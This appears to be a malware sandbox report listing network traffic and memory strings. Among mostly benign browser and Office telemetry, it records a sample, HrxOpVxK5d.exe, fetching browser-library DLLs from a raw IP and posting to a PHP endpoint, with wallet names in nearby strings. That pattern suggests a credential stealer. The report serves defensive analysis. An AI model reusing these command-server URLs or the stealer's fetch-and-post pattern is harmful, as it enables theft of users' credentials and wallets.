Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 77.220.212.32Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/sqlite3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/freebl3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/mozglue.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/msvcp140.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/nss3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/softokn3.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /241bc8c289ca83f4/vcruntime140.dll HTTP/1.1Host: 77.220.212.32Cache-Control: no-cache

Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000003.1326161821.00000F9C03178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1326215222.00000F9C030F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1326305322.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000008.00000003.1326161821.00000F9C03178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1326215222.00000F9C030F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1326305322.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.220.212.32
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/freebl3.dll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/freebl3.dlll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/freebl3.dllz
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/mozglue.dll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/mozglue.dll2
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/msvcp140.dll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/msvcp140.dll$
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/nss3.dll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/nss3.dll1
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/softokn3.dll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/softokn3.dllD
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/softokn3.dllR
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/sqlite3.dll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/241bc8c289ca83f4/vcruntime140.dll
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/9
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.php
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.php59e
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.phpQQ
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.phpance
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.phpctronCash
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.phpecoin
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.phpq9
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.220.212.32/eb51242cada87444.phpy=----GCBKECAKFBGCAKECGIEHen
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://77.220.212.32JDAKFm-data;
Source: HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.220.212.32e
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
